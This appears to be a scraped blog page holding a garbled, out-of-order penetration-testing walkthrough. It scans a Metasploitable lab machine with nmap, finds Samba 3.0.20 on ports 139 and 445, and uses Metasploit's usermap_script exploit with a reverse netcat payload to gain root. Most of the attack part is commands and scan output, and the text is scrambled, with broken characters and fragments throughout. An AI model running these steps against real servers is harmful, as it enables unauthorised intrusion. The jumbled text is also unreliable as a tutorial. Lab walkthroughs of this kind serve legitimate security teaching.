jaesupplies.blogg.se

In here you need to just set rhost you need to enter rhost metasploitable vulnerable machine ip address using below command Msf6 exploit(multi/samba/usermap_script) > No payload configured, defaulting to cmd/unix/reverse_netcat Use exploit/multi/samba/usermap_script msf6 > use exploit/multi/samba/usermap_script For example info 0, use 0 or use exploit/multi/samba/usermap_script # Name Disclosure Date Rank Check DescriptionĠ exploit/multi/samba/usermap_script excellent No Samba "username map script" Command Execution Search Samba 3.0.20 msf6 > search Samba 3.0.20 Metasploit tip: After running db_nmap, be sure toĬheck out the result of hosts and services

Using the metasploit framework we are able to get root access. When we ran namp command we know that root admin and guest already this user exist see below. Please note SMB or Samba 3.0.20 potentially vulnerable for Command Execution for default users like root admin and guest. SMB Version:- SMB 3.0.20 (Samba 3.0.20-Debian) Step 3 Get Root Access msfconsole Netbios-ssn Samba smbd 3.X – 4.X 3.0.20-Debian (workgroup: WORKGROUP) http in Linux Operating System. Port 139, 445 open with smbd vision 3 – 4 and Linux OS. Nmap done: 1 IP address (1 host up) scanned in 13.12 seconds |_smb2-time: Protocol negotiation failed (SMB2) |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user:, NetBIOS MAC: (unknown) |_ message_signing: disabled (dangerous, but default) Nmap scan report for ta (.xxx)ġ39/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)Ĥ45/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

-A for (-A: Enable OS detection, version detection, script scanning, and traceroute).-T4 for (-T: Set timing (higher is faster).

Run this command if you don’t know meaning see below i will explain. Step 2 nmap Scan for Active Reconnaissance We don’t need to deeply understand but if port 139 and 445 or SMB open its simple meaning you are able to communicate with a file server just like port 21 FTP but this is an advanced version. SMB is file or data sharing protocol using SMB or port 139 and 445 you are able to share your file or data in your local computer to computer server and when you’re logging using smbclient tool then you also access other user files or data.